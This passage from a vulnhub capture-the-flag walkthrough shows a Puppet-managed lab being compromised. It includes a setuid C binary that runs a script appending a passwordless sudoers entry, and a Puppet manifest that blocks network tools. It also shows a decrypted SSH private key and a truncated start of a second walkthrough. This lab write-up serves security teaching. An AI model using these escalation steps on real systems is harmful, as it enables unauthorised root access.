    <type arch='x86_64' machine='pc-i440fx-trusty'>hvm</type>
    <boot dev='hd'/>
    <bootmenu enable='yes'/>
    <bios useserial='yes'/>
  </os>
  <features>
    <acpi/>
    <apic/>
    <pae/>
  </features>
  <clock offset='utc'/>
  <on_poweroff>destroy</on_poweroff>
  <on_reboot>restart</on_reboot>
  <on_crash>restart</on_crash>
  <devices>
    <emulator>/usr/bin/qemu-system-x86_64</emulator>
    <disk type='file' device='disk'>
      <driver name='qemu' type='qcow2'/>
      <source file='/var/lib/libvirt/images/barringsbank-1.img'/>
      <target dev='hdb' bus='ide'/>
      <address type='drive' controller='0' bus='0' target='0' unit='1'/>
    </disk>
    <controller type='pci' index='0' model='pci-root'/>
    <controller type='ide' index='0'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x1'/>
    </controller>
    <controller type='usb' index='0'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x2'/>
    </controller>
    <interface type='network'>
      <mac address='52:54:00:6d:93:6a'/>
      <source network='default'/>
      <model type='rtl8139'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x03' function='0x0'/>
    </interface>
    <serial type='pty'>
      <target port='0'/>
    </serial>
    <console type='pty'>
      <target type='serial' port='0'/>
    </console>
    <input type='mouse' bus='ps2'/>
    <input type='keyboard' bus='ps2'/>
    <graphics type='vnc' port='-1' autoport='yes' passwd='memphistennessee'/>
    <video>
      <model type='cirrus' vram='9216' heads='1'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x02' function='0x0'/>
    </video>
    <memballoon model='virtio'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x05' function='0x0'/>
    </memballoon>
  </devices>
</domain>

-------------------------------------------------

root@analoguepond:/etc/libvirt/qemu# cat puppet.xml 
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
  virsh edit puppet
or other application using the libvirt API.
-->

<domain type='qemu'>
  <name>puppet</name>
  <uuid>3561f84c-71c3-f16f-4a7b-9097e7d2ac39</uuid>
  <description>puppetmaster if you mess with this VM I will sendyoubacktowalker</description>
  <memory unit='KiB'>1048576</memory>
  <currentMemory unit='KiB'>1048576</currentMemory>
  <vcpu placement='static'>1</vcpu>
  <os>
    <type arch='x86_64' machine='pc-i440fx-trusty'>hvm</type>
    <boot dev='cdrom'/>
    <boot dev='hd'/>
    <bootmenu enable='yes'/>
    <bios useserial='yes'/>
  </os>
  <features>
    <acpi/>
    <apic/>
    <pae/>
  </features>
  <clock offset='utc'/>
  <on_poweroff>destroy</on_poweroff>
  <on_reboot>restart</on_reboot>
  <on_crash>restart</on_crash>
  <devices>
    <emulator>/usr/bin/qemu-system-x86_64</emulator>
    <disk type='file' device='disk'>
      <driver name='qemu' type='qcow2'/>
      <source file='/var/lib/libvirt/images/puppet-1.img'/>
      <target dev='hdb' bus='ide'/>
      <address type='drive' controller='0' bus='0' target='0' unit='1'/>
    </disk>
    <controller type='pci' index='0' model='pci-root'/>
    <controller type='ide' index='0'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x1'/>
    </controller>
    <controller type='usb' index='0'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x2'/>
    </controller>
    <interface type='network'>
      <mac address='52:54:00:5b:05:f7'/>
      <source network='default'/>
      <model type='virtio'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x03' function='0x0'/>
    </interface>
    <serial type='pty'>
      <target port='0'/>
    </serial>
    <console type='pty'>
      <target type='serial' port='0'/>
    </console>
    <input type='mouse' bus='ps2'/>
    <input type='keyboard' bus='ps2'/>
    <graphics type='vnc' port='-1' autoport='yes' listen='127.0.0.1' passwd='sendyoubacktowalker'>
      <listen type='address' address='127.0.0.1'/>
    </graphics>
    <video>
      <model type='cirrus' vram='9216' heads='1'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x02' function='0x0'/>
    </video>
    <memballoon model='virtio'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x04' function='0x0'/>
    </memballoon>
  </devices>
</domain>

Here we are:

‘memphistennessee’ and ‘sendyoubacktowalker’

So I next attempt to SSH to the puppet host  and am presented with a possible username and a password hint in the SSH banner:

root@analoguepond:/etc/libvirt/qemu# ssh 192.168.122.2
The authenticity of host '192.168.122.2 (192.168.122.2)' can't be established.
ECDSA key fingerprint is 4e:e6:d6:38:8a:9b:3c:aa:0c:55:95:a6:57:ce:f9:e5.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.122.2' (ECDSA) to the list of known hosts.
+-----------------------------------------------+
Passwords are very dated.. Removing spaces helps sandieshaw log in with her 
most famous song                                                            
+-----------------------------------------------+

Back to Google because I clearly do not have knightmare’s music knowledge and I see that Sandie Shaw’s most famous song was called ‘Puppet on a String’. At the time I wasn’t sure if the host name referred to the song name or the Puppet open-source configuration management tool. Knowing knightmare I figured it was the latter and I was in for a wild ride yet.

I logged in with the password ‘puppetonastring’ and things started to get really interesting.

My suspicions were confirmed upon checking out the /etc/puppet directory.  Basically, Puppet is an open-source configuration management tool written in Ruby which uses a series of declarative statements in the form of ‘modules’ to push down configuration changes based upon a client-server model. Seeing that port 8140 and the modules/manifests in the /etc/puppet directory confirmed that I was on the puppetmaster server and the other host in play was the client. Browsing the manifests folder for each module we can see what each module does based on the init.pp file which declares a class and any files, content, commands, permissions, services to install etc.

The nodes.pp file located in /etc/puppet/manifests show which hosts have which modules pushed down to them when a puppet run happens.

sandieshaw@puppet:/etc/puppet/manifests$ cat nodes.pp 

node 'default' {
  include vulnhub
  }

node 'puppet.example.com' inherits 'default' {
  include wiggle
  }

node 'barringsbank.example.com' inherits 'default' {
  }
sandieshaw@puppet:/etc/puppet/manifests$ cat site.pp 
node 'default' {
  include vulnhub
  }

node 'puppet.example.com' inherits 'default' {
  include wiggle
  }

node 'barringsbank.example.com' inherits 'default' {
  include fiveeights
  }

In this case we see that both hosts have the vulnhub module pushed by inheriting the ‘default’ node and that puppet has the wiggle module and our third host barringsbank has the fiveeights module pushed down.

The vulnhub module is hilarious and is knightmare’s revenge/way of stripping out every convenient utility we usually rely on. Bye curl, wget, fetch. No Nano! I started sweating, now I HAD to use vim. Thanks man! The module does a bunch of other stuff which is pretty self-explanatory but one key is that the ‘puppet check in’ cron which happens every 10 minutes. This tells us that hosts will check into the puppetmaster every 10 minutes for anything new, like abused modules :).

sandieshaw@puppet:/etc/puppet/modules/vulnhub/manifests$ cat init.pp 
## Module to unwind changed #vulnhub people make.  This will unwind the most
## common vectors they sued to get at my other VMs

class vulnhub {

## purge packages they abuse too (hello mrB3n, GKNSB, Ch3rn0byl, mr_h4sh)
$purge = [ "nano", "wget", "curl", "fetch","nmap", "netcat-traditional",
           "ncat", "netdiscover", "lftp" ]
  package { $purge:
  ensure => purged,
  }

## The encryption is still primative Egyptian
$theresas_nightmare = [ "cryptcat", "socat" ]
  package { $theresas_nightmare:
  ensure => present,
  }

## Adding to sudoers is a bit naughty so reverse that (most of #vulnhub)
file { "/etc/sudoers.d":
  ensure => "directory",
  recurse => true,
  purge   => true,
  force   => true,
  owner   => root,
  group   => root,
  mode    => 0755,
  source  => "puppet:///modules/vulnhub/sudoers.d",
  }

## revert /etc/passwd (Hey Rasta_Mouse!)
file {'/etc/passwd':
  ensure => present,
  owner  => root,
  group  => root,
  mode   => 0644,
  source => "puppet:///modules/vulnhub/${hostname}-passwd",
  }

## and /etc/group (Hello to you cmaddy)
file {'/etc/group':
  ensure => present,
  owner  => root,
  group  => root,
  mode   => 0644,
  source => "puppet:///modules/vulnhub/${hostname}-group",
  }

## Mr Potato Head! BACKDOORS ARE NOT SECRETS (Hey GKNSB!)
file {'/etc/ssh/ssd_config':
  ensure => present,
  owner  => root,
  group  => root,
  mode   => 0644,
  source => "puppet:///modules/vulnhub/${hostname}-sshd_config",
  notify => Service["ssh"],
  }

## Leave US keyboard for those crazy yanks, and not to torture Ch3rn0byl like
## Gibson
cron { "puppet check in":
  command => "/usr/bin/puppet agent --test > /dev/null 2>&1",
  user => "root",
  minute => "*/10",
  ensure => present,
  }

## Everyone forbidden by default
file {'/etc/hosts.deny':
  ensure => present,
  owner  => root,
  group  => root,
  mode   => 0644,
  source => "puppet:///modules/vulnhub/hosts.deny",
  }

## Firewall off to only specific hosts
file {'/etc/hosts.allow':
  ensure => present,
  owner  => root,
  group  => root,
  mode   => 0644,
  source => "puppet:///modules/vulnhub/${hostname}-hosts.allow",
  }


## Don't fill up the disk
tidy { "/var/lib/puppet/reports":
   age     => "1h",
   recurse => true,
  }

## Changing openssh config requires restart
service { 'ssh':
  ensure      => running,
  enable      => true,
  hasstatus   => true,
  hasrestart  => true,
  }

}

The wiggle module  directory gives us the source code for the C file that creates our spin binary which is funny but useless to attempt to reverse based on the source code. Stay tuned though, it will come into play soon.

sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ ls
spin  spin.c
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ cat spin.c 
#include <stdio.h>
#include <unistd.h>

void
advance_spinner() {
    static char bars[] = { '/', '-', '\\', '|' };
    static int nbars = sizeof(bars) / sizeof(char);
    static int pos = 0;

    printf("%c\r", bars[pos]);
    fflush(stdout);
    pos = (pos + 1) % nbars;
}

int
main() {
    while (1) {
        advance_spinner();
        usleep(300);
    }

    return 0;
}

The wiggle manifest is more interesting and is likely our priv esc. Every puppet run will check to make sure that /tmp/spin is present and then chown it as root and set the SUID bit.

sandieshaw@puppet:/etc/puppet/modules/wiggle/manifests$ cat init.pp 
## My first puppet module by Nick Leeson (C) Barringsbank
## Put spin binary in /tmp to confirm puppet is working
class wiggle {

file { [ "/tmp/spin" ]:
  ensure  => present,
  mode    => 4755,
  owner   => root,
  group   => root,
  source  => "puppet:///modules/wiggle/spin";
  }
}

The spin binary is copied from /etc/puppet/modules/wiggle/files and luckily sandieshaw has write permissions on it so we can do something nasty.

sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ ls -lah
total 732K
drwxrwxr-x 2 root       sandieshaw 4.0K Dec 18 18:42 .
drwxr-xr-x 4 root       root       4.0K Dec 18 18:42 ..
-rwxrwxr-x 1 sandieshaw sandieshaw 717K Dec 17 11:51 spin
-rw-rw-r-- 1 sandieshaw sandieshaw  376 Dec 17 11:52 spin.c

I create my own version of the spin binary which allows me to run command as root like so…

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
  setuid( 0 );
  system( "/home/sandieshaw/rootme.sh" );
  return 0;
}

rootme.sh just contains the following to add sadieshaw to the sudoers group, which is the easiest way given everything that knightmare stripped away from us:

echo "sandieshaw ALL=(ALL:ALL) NOPASSWD:ALL" >> /etc/sudoers

I compile it offline and we can SCP it to the host but I’m lazy so lets just base64 encode offline and decode it on the target:

cat spin  | openssl base64 | awk 'BEGIN{ORS="";} {print}'

...snip...

sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ echo "huge bas64 string" | base64 -d > spin
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ file spin
spin: ELF 32-bit LSB  shared object, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped

We know from earlier that the Puppet run is every 10 minutes so I set everything up and grab some coffee

cron { "puppet check in":
  command => "/usr/bin/puppet agent --test > /dev/null 2>&1",
  user => "root",
  minute => "*/10",
  ensure => present,
  }

After a bit I check and see that the spin binary was replaced based on the time stamp on the file and I am able to sudo to root without a password like a champion.

sandieshaw@puppet:/tmp$ ls -la
total 12
drwxrwxrwt  2 root root 4096 Jun 26 18:20 .
drwxr-xr-x 22 root root 4096 Jan  7 11:45 ..
-rwsr-xr-x  1 root root   57 Jun 26 18:11 spin
sandieshaw@puppet:/tmp$ ls -la
total 16
drwxrwxrwt  2 root root 4096 Jun 26 18:21 .
drwxr-xr-x 22 root root 4096 Jan  7 11:45 ..
-rwsr-xr-x  1 root root 7452 Jun 26 18:21 spin

sandieshaw@puppet:/tmp$ ./spin
sandieshaw@puppet:/tmp$ sudo -s
root@puppet:/tmp#

Once I escalate to root I check out the root directory for a flag or our next clues. I am presented with several files and clues.

root@puppet:/root# cd protovision/
root@puppet:/root/protovision# ls
flag1.txt.0xff  jim  melvin
root@puppet:/root/protovision# cat jim
Mr Potato Head! Backdoors are not a...
root@puppet:/root/protovision# cat melvin 
Boy you guys are dumb! I got this all figured out...
root@puppet:/root/protovision# file flag1.txt.0xff 
flag1.txt.0xff: ASCII text, with very long lines
root@puppet:/root/protovision# cat flag1.txt.0xff 
3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861

So we have a hex string which I decode with xdd to a reversed base64 string and eventually the below YouTube file:

root@puppet:/root/protovision# cat flag1.txt.0xff | xxd -p -r
==gLu4yZulGa0VWbvNHIy9GIlJXZoRHIkJ3b3N3chBHIhBCZulmZgQHanlWbgU3b5BCLulGIzVGd15WatByMyASbvJnZgMXZtF2ZyF2Vgg2Y0F2dgwyay92dgQ3JuNXZvRGIzlGa0BiZJByaU5EMpdzaKpkZH1jd/g2Y0F2dv02bj5SZiVHd19Weuc3d39yL6MHc0RHaroot@puppet:/root/protovision# cat flag1.txt.0xff | xxd -p -r | rev | base64 -d
https://www.youtube.com/watch?v=GfJJk7i0NTk If this doesn't work, watch Wargames from 23 minutes in, you might find a password there or something...

This leads us to our mandatory movie reference, this one being from this scene in WarGames where the characters are discussing back doors. “Mr. Potato Head! Backdoors are not secrets.” In this case we may have a password of “‘secrets’ for something?

The characters also go on to correctly guess ‘Joshua’ is the back door phrase in the movie, I keep this in my back pocket for later. Maybe another password?

Exploring the directory yields a jpeg and then leads us down a rabbit hole of hidden directories.

puppet:/root/protovision# ls -la
total 24
drwxr-xr-x 3 root root 4096 Dec 21  2016 .
drwx------ 4 root root 4096 Jan  7 17:49 ..
-rw-r--r-- 1 root root  401 Dec 21  2016 flag1.txt.0xff
drwxr-xr-x 3 root root 4096 Dec 21  2016 .I_have_you_now
-rw-r--r-- 1 root root   39 Dec 17  2016 jim
-rw-r--r-- 1 root root   53 Dec 17  2016 melvin
root@puppet:/root/protovision# cd .I_have_you_now/
root@puppet:/root/protovision/.I_have_you_now# ls
grauniad_1995-02-27.jpeg
root@puppet:/root/protovision/.I_have_you_now# file grauniad_1995-02-27.jpeg 
grauniad_1995-02-27.jpeg: JPEG image data, JFIF standard 1.02
root@puppet:/root/protovision/.I_have_you_now# ls -la
total 84
drwxr-xr-x 3 root root  4096 Dec 21  2016 .
drwxr-xr-x 3 root root  4096 Dec 21  2016 ..
drwxr-xr-x 3 root root  4096 Dec 18  2016 .a
-r-------- 1 root root 71790 Dec 18  2016 grauniad_1995-02-27.jpeg

The jpeg file does have something hidden in the exif data:

root@kali2:~/Desktop# exiftool grauniad_1995-02-27.jpeg 
ExifTool Version Number         : 10.36
File Name                       : grauniad_1995-02-27.jpeg
Directory                       : .
File Size                       : 70 kB
File Modification Date/Time     : 2016:12:22 22:53:22-05:00
File Access Date/Time           : 2016:12:22 22:53:25-05:00
File Inode Change Date/Time     : 2016:12:22 22:53:22-05:00
File Permissions                : rwxr-xr-x
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Software                        : Acorn version 4.5.1
Exif Image Width                : 460
Exif Image Height               : 276
XP Comment                      : SHA1SUM 0a1f5d1ba9f15fd38b6e37734707bfd295a6795c
Padding                         : (Binary data 2060 bytes, use -b option to extract)
JFIF Version                    : 1.02
Image Width                     : 460
Image Height                    : 276
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 460x276
Megapixels                      : 0.127

I was unable to decrypt the sha1 but I hold onto it for later, knowing that knightmare doesn’t generally make mistakes or put things in his challenges that aren’t connected.

I list out all the subdirectories and am damn glad I didn’t do this by hand.

root@puppet:/root/protovision/.I_have_you_now# find . -type d
.
./.a
./.a/.b
./.a/.b/.c
./.a/.b/.c/.d
./.a/.b/.c/.d/.e
./.a/.b/.c/.d/.e/.f
./.a/.b/.c/.d/.e/.f/.g
./.a/.b/.c/.d/.e/.f/.g/.h
./.a/.b/.c/.d/.e/.f/.g/.h/.i
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u.
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v.
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w.
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x.
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z

Heading in I find several files which look to form a private key if assembled properly. At the bottom of this mess I find a file with the phrase ‘joshua’ which we earlier established must be useful for so mething as well as a gpg encrypted file that by the fle name could be an ssh key for a user ‘nleeson’.

root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# ls
my_world_you_are_persistent_try  nleeson_key.gpg
root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# file my_world_you_are_persistent_try 
my_world_you_are_persistent_try: ASCII text
root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# cat my_world_you_are_persistent_try 
joshua

The gpg file decrypts to a private key file as suspected. The password that worked was actually ‘secret’ not ‘secrets’.

root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# gpg -d nleeson_key.gpg 
gpg: CAST5 encrypted data
gpg: gpg-agent is not available in this session
gpg: encrypted with 1 passphrase
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,1864E0393453C88F778D5E02717B8B16

RTSpHZnf1Onpy3OHfSat0Bzbrx8wd6EBKlbdZiGjEB0AC4O0ylrSBoWsEJ/loSL8
jdTbcSG0/GWJU7CS5AQdK7KctWwqnOHe9y4V15gtZcfgxNLrVfMUVAurZ3n2wQqK
ARmqBXhftPft8EBBAwWwQmBrD+ufF2uaJoKr4Bfu0zMFQxRnNDooBes5wyNO/7k6
osvGqTEX/xwJG1GB5X0jsDCmBH4WXhafa0nzZXvd2Pd3UpaWPEgyq3vxIQaredR8
VbJbPSeKypTIj3UyEj+kjczhCiWw9t0Mv0aV4FtMOesnDQYJskL8kSLGRkN+7lHD
IcHz7az9oqYGBSq77lPkmk7oIpT/pg80pfCyHExROwlTRPzVRHv7KGiKd35R0Hl9
7CUQPCjH5ltQW4B6XUmxmoT8N14w5HOxb/JlV7s2g6dXYT0azOeqDsGivpgMY3vy
rtVakLIsZeYaZYSr6WvTFclXWYctYPMgzRewiRPjyn6DXiD6MtCJZj2CqJ47tP37
eRRgRRH6a1Sm/BkfSPIXlV0tTpOXfjtHG7VoIc5X343GL/WHM/nhNFvMLdRnVXRM
YOEKAsYklBLqZ99btTESwJZt9HG/cGpQrbgFwxKPoJy7f5wNLOa1ZhpDyw1IqokO
Pq4r8zZj4ASyg3gl7ByG11C272mkMG8yiIwOckVgNec/se18PUGBw1HHgRuyzDym
/6/cwkDzoJlResjsNDQCQcNzSOoZxi3GFIIiB+HjG84MF+ofnn3ayaUZLUaBbPMJ
jQ7dP6wqIMYwY5ZM6nRQ+RnL6QVBHnXH9RjmbzdVMzmQDjPS0lOg5xkU8B78vG6e
lphvmlLSM+PFVOqPwhVB8yon97aU23npKIOPu44VsUXU0auKI94qoX0I1EDDQFrE
UqpWUpCCHrRRTZCdnnE6RnJZ+rjGPvFA95lhUp1fpF8l4U3a8qKlsdtWmzYxHdyg
+w0QE8VdDsNqgCP7W6KzvN5E5HJ0bbQasadAX5eDd6I94V0fCZrPlzM+5CAXH4E4
qhmWQPCw7Q1CnW61yG8e9uD1W7yptK5NyZpHHkUbZGIS+P7EZtS99zDPh3V4N7I2
Mryzxkmi2JyQzf4T1cfK7JTdIC2ULGmFZM26BX3UCV0K+9OOGgRDPU4noS0gNHxP
VaWVmjGgubE4GDlW0tgw1ET+LaUdAv/LE+3gghpRLn1imdaW9elnIeaVeOWcyrBC
Ypl8AjYXNRd0uLWBC8xbakmK1tZUPXwefqjQpKjuIuYmmVes3M4DFxGQajmK03nO
oGaByHu0RVjy0x/zBuOuOp6eKpeaiLWfLM5DSIWlksL/2dmAloSs3LrIPu4dTnRb
v2YQ+72nLI62alLEaKwXUBoHSSRNTv0hbOyvV8YUp4EmJ8yShAmEE/n9Et62BwYB
rsi0RhEfih+43PzlwB91I4Elr2k3eBwQ9XiF3KdVgj6wvwqNLZ7aC5YpLcYaVyNT
fKzUxX02Ejvo60xWJ8u6GIhUK404s2WVeG/PCLwtrKGjpyPCn3yCWpCWpGPuVNrx
Wg0Um581e4Vw5CLDL5hRLmo7wiqssuL3/Uugf/lc2vF+MxJyoI1F9Zkt2xvRYrLB
-----END RSA PRIVATE KEY-----
gpg: WARNING: message was not integrity protected

I test out the key and am able to SSH to the barringsbank host with the private key and passphrase ‘joshua’ from earlier.

root@puppet:/root# chmod 600 nick_key 
root@puppet:/root# ssh -i nick_key nleeson@192.168.122.3
Enter passphrase for key 'nick_key': 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

 System information disabled due to load higher than 1.0


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

nleeson@barringsbank:~$

This system is pretty bare so I turn back to Puppet for clues. Taking a look at the Puppet configuration I see that I can edit /etc/puppet/manifests/site.pp and nodes.pp to include the wiggle module on barringsbanks. I make this change and wait a  bit.

nleeson@barringsbank:~$ cd /tmp
nleeson@barringsbank:/tmp$ ./spin
nleeson@barringsbank:/tmp$ sudo -s
root@barringsbank:/tmp# cd /root
root@barringsbank:/root# ls
me.jpeg

Now we have another image file which I pull down locally and run steghide against. We’ve come full circle and the term ‘reticulating splines’ was the passphrase.

root@kali:/var/www/html# steghide extract -sf me.jpeg 
Enter passphrase: 
wrote extracted data to "primate_egyptian_flag.txt".
root@kali2-CTP:/var/www/html# cat primate_egyptian_flag.txt 
674143496741434967414349674143496741434967414349674143496741
69434b34694c7555336235426963765a47497a4e5859694269636c526d62
6c5a4749684279636e556d636c686b430a67414349674143496741434967
41434967414349674143496741434967414349674143494b386c4c743053
4c7538464967414349674143496734534c73414349674143496741434967
4143490a6741434967414349674143496741434967414349674143496741
43496741434967414349674143494b34435967414349674143496763794a
74347958663543586742434938424349674143490a663931586639315866
393158663931586639315875307a4b7273434c6741434967414349674143
4967416943634243496734434c6741795867414349674143496741795867
414358674143490a39305450393054503930545039305450393054503934
796276396d4c666843496741434967414349674143494b77484967414349
3878335838394666663931586639315838783358703831580a3842434967
414349674143496741434967414349674143496e346e6667414349674143
496741434967414349676f41666741434967774866397758503831545039
30545039774866393054500a677746496741434967414349674143496741
434967414349674143496741434967414349674143496741434967414349
4b384349673847497642794a2b424749674143496741794a2b4243490a67
636966674243496741434967414349674143496741434967414349674143
4967414349674143496741434967414349674143494b3843496738474976
4243496741434963426d66764143490a765a47496b355759673457616864
575967553259753947493139576567384764674d6e62766c476468785764
30466d636e353262447067434b41794a7434795866393158753043596741
43490a673847646751575a704a486467556d646e6b6b434b4153496e4647
626d7077637068476467636d62704a5864304258596a4269627642535a74
6c476467674764346c326367554761304269630a734233636852585a7442
7964764a486130425362764a6e5a676b5859334647496c5a336274427962
3042434c6c4a585a6f424364704a474968424363314279636e3557616f52
4849346c57620a3042435a6c6c33627135575a67556d6468684749313957
6567554763766847494a42694c7a646d627068476467515859674d486470
3947627768585a6749575a3342435a75466d43306c32620a774258596755
6d596751476231393264675133596c423363684279637068476467343262
67733259684a475a6c566d5a4b495864766c48496b355759673432627052
6e6376424849304647610a6a563263674d57613046576276525864684279
626b427962304243646c4e48496c4a5859674d58545742535a7a56476130
42434c6c5233627542695a507067437551575a304657616a566d630a674d
335a756c4761304243636c56326167384764675148616e563362674d5861
6f524849764e6e437351585a774258647742795a756c3263314279636c52
58596b425864676b4864704a58640a4331474d6b3557595342434c754e6a
5179314749765248497a746d6268684764676b6e6268316b434b34535a73
4233626c42484979396d5a6767325a31396d626c42795970315759756c48
5a0a354279617546476130424362686c32596c42336367456b434b346952
554e45497a6c47613042795a756c47647a564764674933626d4269657535
57613256326167516d62684269576c5258650a685a6e436c68476467516d
62684279636c646d626c78476268683259675532636c6847646777476268
42795a756c47647a394761674933626d427961786b576230427a5a673847
64675533620a68424364755632596c4a48497a6c4761674933626d426962
7a496d637442796230424364686847496c68476467593262674158613042
53516734535a6a6c6d646b4647496c786d59685648620a765a47496e3557
61723932627342535a7946474931395765675957616749585a3052586133
52484979394749444a565367343262675557624b5158614942694c6c4e6d
6268523363704e33630a30564762773132624442434c7539474976646b43
4b34535a6e35575a737857596f4e6d436c6847646751575a305647627731
32626a42535a324647616749336267516e6270684749684269630a7a526d
626c6c6d6347426963313945496d394749784d43496c5232627a6c47636c
42695a7642534e306f7a4e774179623042434d7a6f6a4e7741694f6c7832
59796c3259675547613042535a0a676f77507534694c7534326270523359
6c356d62764e47496c684764674d334a304647615842694c7555544f3545
4449444a6b51676b79516f414361304a33624f42535a6f526c43756c4549
0a6741434967414349674143496741434967414349674143496741434967
414349674143496741434967414349674143496741434967414349674143
49674143496741434967414349674143490a3d6f515a794657623068325a
70353253743043490a

Looks like hex again, which then decodes to another reversed base64 string.  At last, the final flag:

root@kali2-CTP:/var/www/html# cat primate_egyptian_flag.txt | xxd -p -r | rev | base64 -d

What an awesome, intense, and comprehensive challenge! Thanks to knightmare for making this and to g0tm1lk and the whole vulnhub community for hosting this one! Until next time.

HackDay: Albania vulnhub walkthrough

Another new VM dropped over at vulnhub. You can grab it here: https://www.vulnhub.com/entry/hackday-albania,167/

The readme comes with the following note: Note: VMware users may have issues with the network interface doing down by default. We recommend (for once!) using Virtualbox.

Well, with a few steps we can get this working on VMware.

I first attached a CD-rom to the VM and added a Gparted ISO, selected boot to firmware and changed the boot order in BIOS to boot from the ISO. Once Gparted loaded I was able to mount the file system and make a few changes with the following steps within a terminal window:

	1) sudo su
	2) mount /dev/sda1 /mnt
	3) vim /mnt/etc/network/interfaces and change the interface to 'eth0'
	4) Vim /mnt/etc/default/grub and edit the line 
	GRUB_CMDLINE_LINUX="" to read: 
	GRUB_CMDLINE_LINUX="net.ifnames=0 biosdevname=0"
	5) Poweroff
	6) Swap the Gparted ISO for an Ubuntu server ISO, follow the same steps to boot from the CD and once the installer menu loads choose "rescue a broken system" to boot into rescue mode.
	7) Follow all the prompts until arriving at the screen that allows you to execute a shell on /dev/sda1.
	8) In this shell type "update-grub" then type "exit"
	9) Select "execute a shell in the installer environment", then "poweroff"
       10) Remove the CD from the VM, boot to firmware and change the boot order back to the HDD. Once the VM boots up it should grab a lease from DHCP and be fully discoverable from your attacking machine.

h/t to knightmare for pointing me towards this article:

http://www.itzgeek.com/how-tos/mini-howtos/change-default-network-name-ens33-to-old-eth0-on-ubuntu-16-04.html>

Once that was done I was off and running. Started off with an nmap scan which gave me SSH and an Apache web server on a non-standard port.

root@mrb3n:~/Desktop# nmap -p- -T4 192.168.253.136

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-11-19 19:45 EST
SYN Stealth Scan Timing: About 12.53% done; ETC: 20:00 (0:13:02 remaining)
Nmap scan report for 192.168.253.136
